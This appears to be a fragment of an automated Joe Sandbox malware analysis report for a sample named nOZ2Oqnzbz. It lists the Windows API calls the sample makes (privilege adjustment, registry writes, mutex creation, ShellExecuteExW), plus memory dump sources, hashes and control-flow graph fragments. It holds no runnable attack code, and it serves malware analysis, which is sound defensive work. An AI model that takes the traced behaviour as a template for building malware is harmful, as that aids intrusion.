                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GetClientRect.USER32(?), ref: 0040AACF
                                                                                            • Part of subcall function 00404EC0: CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                                          • 6CEF50F0.MFC42(00007F8B), ref: 0040AAF4
                                                                                          • 6CEFF390.MFC42(00000086,0000000C,00000086,00007F8B), ref: 0040AB05
                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 0040AB29
                                                                                          • SetCursor.USER32(00000000), ref: 0040AB30
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: CursorRect$ClientCopyF390Load
                                                                                          • String ID:
                                                                                          • API String ID: 1342657587-0
                                                                                          • Opcode ID: 8401a0d3b9610f6867fc9abfd7e5f3a5b13e2096a23212c21d3ded89cf437529
                                                                                          • Instruction ID: a14a2b21b2a6be2e79b6b6eccd3370489a499e26bf242809d1e0371c1f30db29
                                                                                          • Opcode Fuzzy Hash: 8401a0d3b9610f6867fc9abfd7e5f3a5b13e2096a23212c21d3ded89cf437529
                                                                                          • Instruction Fuzzy Hash: 5CF08C71948301EBE210A7A48C46E7772A9F708705F00063FB386B50D1D9B8B411879F
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?), ref: 0040A7AF
                                                                                          • 6CEFE6C0.MFC42(?), ref: 0040A7BC
                                                                                            • Part of subcall function 00404EC0: CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                                          • SetCapture.USER32(?,?), ref: 0040A7E8
                                                                                          • 6CEFCE30.MFC42(00000000), ref: 0040A7EF
                                                                                          • 6CEFFEB0.MFC42(00000000), ref: 0040A7F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$CaptureCopyWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1880163643-0
                                                                                          • Opcode ID: eebbbd06ba35c8f5644d263c1b2b432bf9dbc5c997de85ab1361be0e6822f123
                                                                                          • Instruction ID: ae120400b2eecb044a03360b6c29ead0659f610c9d08a9c692d6112fa6188a77
                                                                                          • Opcode Fuzzy Hash: eebbbd06ba35c8f5644d263c1b2b432bf9dbc5c997de85ab1361be0e6822f123
                                                                                          • Instruction Fuzzy Hash: F1F03CB55107059FC314EB25C4958ABB7E9FB88304B008E2EF4C653341EA34E904CB95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • 6CF30310.MFC42(00000066,0040B588,?,00000000,?,0040B588,000000FF,00405856,00000000), ref: 0040A1D4
                                                                                          • 6CEF50F0.MFC42(00000066,0040B588,?,00000000,?,0040B588), ref: 0040A1E7
                                                                                          • 6CEFF390.MFC42(00000080,0000000E,00000080,00000066,0040B588,?,00000000,?,0040B588), ref: 0040A1F8
                                                                                          • LoadIconA.USER32(00000000,00000080), ref: 0040A1FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: F30310F390IconLoad
                                                                                          • String ID:
                                                                                          • API String ID: 2277313538-0
                                                                                          • Opcode ID: fc3814bc266c29e8a464827beffdbcda4908966a597202a9ea25da8d9df3f7a9
                                                                                          • Instruction ID: 010850fd7a8354b729b1543937e653244a36a0c6ea06adee83ac2cb2bc03d40c
                                                                                          • Opcode Fuzzy Hash: fc3814bc266c29e8a464827beffdbcda4908966a597202a9ea25da8d9df3f7a9
                                                                                          • Instruction Fuzzy Hash: 5BF054B1644751EBE320DF59C902B07B6D4FB44B10F004A2EF591B77D0C7BD94048B99
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:13%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:9.5%
                                                                                          Total number of Nodes:63
                                                                                          Total number of Limit Nodes:3
                                                                                          execution_graph 1655 aaa8ca 1656 aaa8f9 AdjustTokenPrivileges 1655->1656 1658 aaa91b 1656->1658 1663 aab102 1666 aab137 WriteFile 1663->1666 1665 aab169 1666->1665 1711 aab0e2 1713 aab102 WriteFile 1711->1713 1714 aab169 1713->1714 1735 aaa462 1737 aaa486 RegSetValueExW 1735->1737 1738 aaa507 1737->1738 1719 aaae23 1722 aaae5a CreateFileW 1719->1722 1721 aaaee1 1722->1721 1739 aaa960 1740 aaa99a FindCloseChangeNotification 1739->1740 1742 aaa9d4 1740->1742 1743 aaa361 1744 aaa392 RegQueryValueExW 1743->1744 1746 aaa41b 1744->1746 1671 aaabc6 1672 aaabfe CreateMutexW 1671->1672 1674 aaac41 1672->1674 1675 aab326 1676 aab34c ShellExecuteExW 1675->1676 1678 aab368 1676->1678 1679 aaaa46 1680 aaaa7b NtQuerySystemInformation 1679->1680 1681 aaaaa6 1679->1681 1682 aaaa90 1680->1682 1681->1680 1727 aab304 1729 aab326 ShellExecuteExW 1727->1729 1730 aab368 1729->1730 1683 aaa99a 1684 aaa9c6 FindCloseChangeNotification 1683->1684 1685 aaaa07 1683->1685 1686 aaa9d4 1684->1686 1685->1684 1687 aaae5a 1688 aaae92 CreateFileW 1687->1688 1690 aaaee1 1688->1690 1747 aaa67b 1748 aaa6ae LookupPrivilegeValueW 1747->1748 1750 aaa6fe 1748->1750 1691 aaa2fe 1692 aaa32a SetErrorMode 1691->1692 1693 aaa353 1691->1693 1694 aaa33f 1692->1694 1693->1692 1703 aaab92 1705 aaabc6 CreateMutexW 1703->1705 1706 aaac41 1705->1706 1715 aaa2d2 1718 aaa2d6 SetErrorMode 1715->1718 1717 aaa33f 1718->1717 1707 aaa893 1709 aaa89d AdjustTokenPrivileges 1707->1709 1710 aaa91b 1709->1710 1723 aaaf30 1724 aaaf72 GetFileType 1723->1724 1726 aaafd4 1724->1726 1731 aaaa15 1732 aaaa46 NtQuerySystemInformation 1731->1732 1734 aaaa90 1732->1734

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 90 aaa893-aaa8f7 94 aaa8f9 90->94 95 aaa8fc-aaa90b 90->95 94->95 96 aaa94e-aaa953 95->96 97 aaa90d-aaa92d AdjustTokenPrivileges 95->97 96->97 100 aaa92f-aaa94b 97->100 101 aaa955-aaa95a 97->101 101->100
                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00AAA913
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: ca3e9a609827b3e2e43cd2871e6d7ba79cee9fcb248c73f7a73bc4e11c756233
                                                                                          • Instruction ID: 6081f1c1909c16b72867c7ea70860d87b26d9589b8b12cee3989b1fa71559ad5
                                                                                          • Opcode Fuzzy Hash: ca3e9a609827b3e2e43cd2871e6d7ba79cee9fcb248c73f7a73bc4e11c756233
                                                                                          • Instruction Fuzzy Hash: F121D1765097809FEB228F25DC40B52BFF4EF17310F0984DAE9858B5A3D375A908CB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • NtQuerySystemInformation.NTDLL ref: 00AAAA81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQuerySystem
                                                                                          • String ID:
                                                                                          • API String ID: 3562636166-0
                                                                                          • Opcode ID: 7e8f9f64220407db2ec7c247f314b060a821e53f57415823e6bd0be0ffff1a2c
                                                                                          • Instruction ID: b02bc3af4ebd2468ce5051e9439ce7633c2ddab0ea3f95e8c5cbf8bce37a94e3
                                                                                          • Opcode Fuzzy Hash: 7e8f9f64220407db2ec7c247f314b060a821e53f57415823e6bd0be0ffff1a2c
                                                                                          • Instruction Fuzzy Hash: D411D0714093C09FDB228F10DC44A52FFF4EF17314F0984CAE9848B263D275A908CB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00AAA913
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: 88636a6e010899557eed66780a29b4f3f1fb78926fa4a8a9cb5dc46c9931f83b
                                                                                          • Instruction ID: 2753920525a2c80d43f685d86053dcfc4e648e79a59c0aca62f2f1e48aa04ac1
                                                                                          • Opcode Fuzzy Hash: 88636a6e010899557eed66780a29b4f3f1fb78926fa4a8a9cb5dc46c9931f83b
                                                                                          • Instruction Fuzzy Hash: E211C2726003009FEB20CF55D844B66FBE4EF19320F08C46ADD4A8B652D335E418DF62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • NtQuerySystemInformation.NTDLL ref: 00AAAA81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQuerySystem
                                                                                          • String ID:
                                                                                          • API String ID: 3562636166-0
                                                                                          • Opcode ID: 014e26fed7254b54e1554f065120d919e69508456733eac5689aa977cfbf4a13
                                                                                          • Instruction ID: d21fb9c74ea22b67135ab3eecd53cdd4d418954994ee995a3dede97b7c626ead
                                                                                          • Opcode Fuzzy Hash: 014e26fed7254b54e1554f065120d919e69508456733eac5689aa977cfbf4a13
                                                                                          • Instruction Fuzzy Hash: 4701A235500240DFDB208F45DA44B62FBF0EF19360F08C4AADD4A4B652D375E418DFA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 094780a3432d6be59976ab7a436565820814a7a707ae82fa0b9a39ecd12513ce
                                                                                          • Instruction ID: 600bfa199517e035e72c8284ee9f0f174128d88d189976b7fcb23ac3fcc63682
                                                                                          • Opcode Fuzzy Hash: 094780a3432d6be59976ab7a436565820814a7a707ae82fa0b9a39ecd12513ce
                                                                                          • Instruction Fuzzy Hash: F3721474E40269CFCB24DF68D984BADB7B2FB48308F2485A9D409AB755DB34AD81CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 aaae23-aaaeb2 4 aaaeb7-aaaec3 0->4 5 aaaeb4 0->5 6 aaaec8-aaaed1 4->6 7 aaaec5 4->7 5->4 8 aaaf22-aaaf27 6->8 9 aaaed3-aaaef7 CreateFileW 6->9 7->6 8->9 12 aaaf29-aaaf2e 9->12 13 aaaef9-aaaf1f 9->13 12->13
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00AAAED9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 81757d6a87a097075710284575175afc69930e10cc9f1a1762e84706cc4a5c56
                                                                                          • Instruction ID: aa498e9ee67c73d467c5f4fb76a8fcee8d95edb64418ee5bf2159d23dd0f8d26
                                                                                          • Opcode Fuzzy Hash: 81757d6a87a097075710284575175afc69930e10cc9f1a1762e84706cc4a5c56
                                                                                          • Instruction Fuzzy Hash: 9A31D0B1505380AFE722CF61CC44B62BFF8EF16314F08849AE9858B692D375E909CB71
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 16 aaab92-aaac15 20 aaac1a-aaac23 16->20 21 aaac17 16->21 22 aaac28-aaac31 20->22 23 aaac25 20->23 21->20 24 aaac82-aaac87 22->24 25 aaac33-aaac57 CreateMutexW 22->25 23->22 24->25 28 aaac89-aaac8e 25->28 29 aaac59-aaac7f 25->29 28->29
                                                                                          APIs
                                                                                          • CreateMutexW.KERNELBASE(?,?), ref: 00AAAC39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateMutex
                                                                                          • String ID:
                                                                                          • API String ID: 1964310414-0
                                                                                          • Opcode ID: 2cfe73a671241b1e2f2d55a4fe3d6f2621146f2109257815f3fd75409a014648
                                                                                          • Instruction ID: 3cfb0cd1489c8a70fdd0a4fdb51164274aad12d918d214fb569fc25191f3b9c5
                                                                                          • Opcode Fuzzy Hash: 2cfe73a671241b1e2f2d55a4fe3d6f2621146f2109257815f3fd75409a014648
                                                                                          • Instruction Fuzzy Hash: E9319EB15093846FE711CF65CC45BA6BFF8EF16214F08849AE984CB293D375E909C762
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 32 aaa361-aaa3cf 35 aaa3d1 32->35 36 aaa3d4-aaa3dd 32->36 35->36 37 aaa3df 36->37 38 aaa3e2-aaa3e8 36->38 37->38 39 aaa3ea 38->39 40 aaa3ed-aaa404 38->40 39->40 42 aaa43b-aaa440 40->42 43 aaa406-aaa419 RegQueryValueExW 40->43 42->43 44 aaa41b-aaa438 43->44 45 aaa442-aaa447 43->45 45->44
                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAA40C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: e2305b26f19227e63708f248b660d672b9a230fe6c8d5c841d38a56a5366f254
                                                                                          • Instruction ID: 757df09e6e9cf7ae49a40a82df5b59d48d9740c2a31c410566f46fbd6506203f
                                                                                          • Opcode Fuzzy Hash: e2305b26f19227e63708f248b660d672b9a230fe6c8d5c841d38a56a5366f254
                                                                                          • Instruction Fuzzy Hash: 0F317175509784AFE722CF11CC85F92BBF8EF16710F08849AE945CB692D364E909CB72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 49 aaaf30-aaafbd 53 aaafbf-aaafd2 GetFileType 49->53 54 aaaff2-aaaff7 49->54 55 aaaff9-aaaffe 53->55 56 aaafd4-aaaff1 53->56 54->53 55->56
                                                                                          APIs
                                                                                          • GetFileType.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAAFC5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileType
                                                                                          • String ID:
                                                                                          • API String ID: 3081899298-0
                                                                                          • Opcode ID: 6cc96162e2226ac84967fc85f4fa119231cb3c47587e5211d6654bdbaeb1162f
                                                                                          • Instruction ID: ca674b3fbf250358af649eeb3150938c61f1513b21257022c29c042bf05062c6
                                                                                          • Opcode Fuzzy Hash: 6cc96162e2226ac84967fc85f4fa119231cb3c47587e5211d6654bdbaeb1162f
                                                                                          • Instruction Fuzzy Hash: 0D213AB54097806FE7128B15DC81BA6BFBCEF17324F0980D6E9818B293D364AD09C7B1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 60 aaa462-aaa4c3 63 aaa4c8-aaa4d4 60->63 64 aaa4c5 60->64 65 aaa4d9-aaa4f0 63->65 66 aaa4d6 63->66 64->63 68 aaa4f2-aaa505 RegSetValueExW 65->68 69 aaa527-aaa52c 65->69 66->65 70 aaa52e-aaa533 68->70 71 aaa507-aaa524 68->71 69->68 70->71
                                                                                          APIs
                                                                                          • RegSetValueExW.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAA4F8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: 80a152eec468f159cbb2f7845ffbfa0ae37955181713b19ab4e099dbde271fe5
                                                                                          • Instruction ID: f766393234ef551af2b1e48353d789e2436ca315b3ca754e148061c9d2882806
                                                                                          • Opcode Fuzzy Hash: 80a152eec468f159cbb2f7845ffbfa0ae37955181713b19ab4e099dbde271fe5
                                                                                          • Instruction Fuzzy Hash: F52192765083846FD7228F51DC45F67BFF8EF56210F08849AE945CB692D364E808C7B2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 75 aaae5a-aaaeb2 78 aaaeb7-aaaec3 75->78 79 aaaeb4 75->79 80 aaaec8-aaaed1 78->80 81 aaaec5 78->81 79->78 82 aaaf22-aaaf27 80->82 83 aaaed3-aaaedb CreateFileW 80->83 81->80 82->83 84 aaaee1-aaaef7 83->84 86 aaaf29-aaaf2e 84->86 87 aaaef9-aaaf1f 84->87 86->87
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00AAAED9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 4108a7a4bc74f1ab587a1174437567e0711c3ca439906bfe164013767cc57d5f
                                                                                          • Instruction ID: 4bffaeb8ebb9cef914bbd99bf36ecafe4a3418dc171cc474c1b06e2b3aadd31d
                                                                                          • Opcode Fuzzy Hash: 4108a7a4bc74f1ab587a1174437567e0711c3ca439906bfe164013767cc57d5f
                                                                                          • Instruction Fuzzy Hash: C621B271604204AFE720DF65DD45B66FBE8EF19310F04846AE9458BA92D375E808CB72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 103 aaa67b-aaa6d5 105 aaa6da-aaa6e0 103->105 106 aaa6d7 103->106 107 aaa6e2 105->107 108 aaa6e5-aaa6ee 105->108 106->105 107->108 109 aaa6f0-aaa6f8 LookupPrivilegeValueW 108->109 110 aaa731-aaa736 108->110 111 aaa6fe-aaa710 109->111 110->109 113 aaa738-aaa73d 111->113 114 aaa712-aaa72e 111->114 113->114
                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00AAA6F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: 579a22e6adacee2e431ef801d339d279ed5b347233bc338a50117731324dd8a0
                                                                                          • Instruction ID: ea9d2bf505abedc53d5dc376fa18dea9470eaf5cf8738b4d312a90cbdcada93c
                                                                                          • Opcode Fuzzy Hash: 579a22e6adacee2e431ef801d339d279ed5b347233bc338a50117731324dd8a0
                                                                                          • Instruction Fuzzy Hash: DB2180755093805FD7128B65DC85B92BFF8AF17310F0984DAE885CB2A3D324E909CB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 116 aaabc6-aaac15 119 aaac1a-aaac23 116->119 120 aaac17 116->120 121 aaac28-aaac31 119->121 122 aaac25 119->122 120->119 123 aaac82-aaac87 121->123 124 aaac33-aaac3b CreateMutexW 121->124 122->121 123->124 126 aaac41-aaac57 124->126 127 aaac89-aaac8e 126->127 128 aaac59-aaac7f 126->128 127->128
                                                                                          APIs
                                                                                          • CreateMutexW.KERNELBASE(?,?), ref: 00AAAC39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateMutex
                                                                                          • String ID:
                                                                                          • API String ID: 1964310414-0
                                                                                          • Opcode ID: a246f9e1b7fa793bffa4cfd90bf64cda1541786c2d46a38666bbd851cb7696ed
                                                                                          • Instruction ID: 4c655d252d294cfead37e07f4d575e6a026a8858bbeb7fd872762e7b2eefa99d
                                                                                          • Opcode Fuzzy Hash: a246f9e1b7fa793bffa4cfd90bf64cda1541786c2d46a38666bbd851cb7696ed
                                                                                          • Instruction Fuzzy Hash: 9421B0716042049FF720DF65CD45BA6FBE8EF25324F048869E9448B782D775E909CA72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 131 aab0e2-aab159 135 aab15b-aab17b WriteFile 131->135 136 aab19d-aab1a2 131->136 139 aab17d-aab19a 135->139 140 aab1a4-aab1a9 135->140 136->135 140->139
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAB161
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3934441357-0
                                                                                          • Opcode ID: 23e4c334eab4a960187760deea3435fbd76131a8fbc82758544dc22fd147427e
                                                                                          • Instruction ID: 12bd456f7faa7b4bb3ce0d91326b56fee47b9ed2eff1a3c76baba9e4af48fcd0
                                                                                          • Opcode Fuzzy Hash: 23e4c334eab4a960187760deea3435fbd76131a8fbc82758544dc22fd147427e
                                                                                          • Instruction Fuzzy Hash: 2021B071509384AFD7228F51CC44F96BFB8EF55210F08889AE9458B552C325A908CBB1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 143 aaa392-aaa3cf 145 aaa3d1 143->145 146 aaa3d4-aaa3dd 143->146 145->146 147 aaa3df 146->147 148 aaa3e2-aaa3e8 146->148 147->148 149 aaa3ea 148->149 150 aaa3ed-aaa404 148->150 149->150 152 aaa43b-aaa440 150->152 153 aaa406-aaa419 RegQueryValueExW 150->153 152->153 154 aaa41b-aaa438 153->154 155 aaa442-aaa447 153->155 155->154
                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAA40C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: 701a4e90d25d108bcb9aaa0377947aca6ad65958d20b69c83dff86fdcccd1ef6
                                                                                          • Instruction ID: 3f960761df73100579171d007f647342d2591b31db90e8c2f1eba54acff64cac
                                                                                          • Opcode Fuzzy Hash: 701a4e90d25d108bcb9aaa0377947aca6ad65958d20b69c83dff86fdcccd1ef6
                                                                                          • Instruction Fuzzy Hash: 78219075600204AFEB20CF55CC85FA6F7ECEF29710F04846AE946CB691D764E809CAB2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
